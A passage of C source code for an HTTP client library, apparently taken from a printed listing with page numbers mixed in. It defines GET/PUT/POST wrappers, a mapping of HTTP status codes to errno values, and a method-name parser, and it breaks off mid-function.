http_destroy_request (request);
return n;
}
ssize_t
http_get (int fd, Http_destination *dest)


591

{
return http_method (fd, dest, HTTP_GET, -1);
}
ssize_t
http_put (int fd, Http_destination *dest, size_t length)
{
return http_method (fd, dest, HTTP_PUT, (ssize_t)length);
}
ssize_t
http_post (int fd, Http_destination *dest, size_t length)
{

return http_method (fd, dest, HTTP_POST, (ssize_t)length);
}
int
http_error_to_errno (int err)
{
/* Error codes taken from RFC2068. */
switch (err)
{
case -1: /* system error */
return errno;
case -200: /* OK */
case -201: /* Created */
case -202: /* Accepted */
case -203: /* Non-Authoritative Information */
case -204: /* No Content */
case -205: /* Reset Content */
case -206: /* Partial Content */
return 0;
case -400: /* Bad Request */
log_error ("http_error_to_errno: 400 bad request");
return EIO;
case -401: /* Unauthorized */
log_error ("http_error_to_errno: 401 unauthorized");
return EACCES;
case -403: /* Forbidden */
log_error ("http_error_to_errno: 403 forbidden");
return EACCES;
case -404: /* Not Found */
log_error ("http_error_to_errno: 404 not found");
return ENOENT;

case -411: /* Length Required */
log_error ("http_error_to_errno: 411 length required");
return EIO;
case -413: /* Request Entity Too Large */
log_error ("http_error_to_errno: 413 request entity too large
");
return EIO;
case -505: /* HTTP Version Not Supported */
log_error ("http_error_to_errno: 413 HTTP version not support
ed");
return EIO;
case -100: /* Continue */


592

case -101: /* Switching Protocols */
case -300: /* Multiple Choices */
case -301: /* Moved Permanently */
case -302: /* Moved Temporarily */
case -303: /* See Other */
case -304: /* Not Modified */
case -305: /* Use Proxy */
case -402: /* Payment Required */
case -405: /* Method Not Allowed */
case -406: /* Not Acceptable */
case -407: /* Proxy Autentication Required */
case -408: /* Request Timeout */
case -409: /* Conflict */
case -410: /* Gone */

case -412: /* Precondition Failed */
case -414: /* Request-URI Too Long */
case -415: /* Unsupported Media Type */
case -500: /* Internal Server Error */
case -501: /* Not Implemented */
case -502: /* Bad Gateway */
case -503: /* Service Unavailable */
case -504: /* Gateway Timeout */
log_error ("http_error_to_errno: HTTP error %d", err);
return EIO;
default:
log_error ("http_error_to_errno: unknown error %d", err);
return EIO;
}
}
static Http_method
http_string_to_method (const char *method, size_t n)
{
if (strncmp (method, "GET", n) == 0)
return HTTP_GET;
if (strncmp (method, "PUT", n) == 0)
return HTTP_PUT;
if (strncmp (method, "POST", n) == 0)
return HTTP_POST;
if (strncmp (method, "OPTIONS", n) == 0)
return HTTP_OPTIONS;
if (strncmp (method, "HEAD", n) == 0)
return HTTP_HEAD;
if (strncmp (method, "DELETE", n) == 0)
return HTTP_DELETE;

if (strncmp (method, "TRACE", n) == 0)
return HTTP_TRACE;
return -1;
}
static const char *
http_method_to_string (Http_method method)
{
switch (method)
{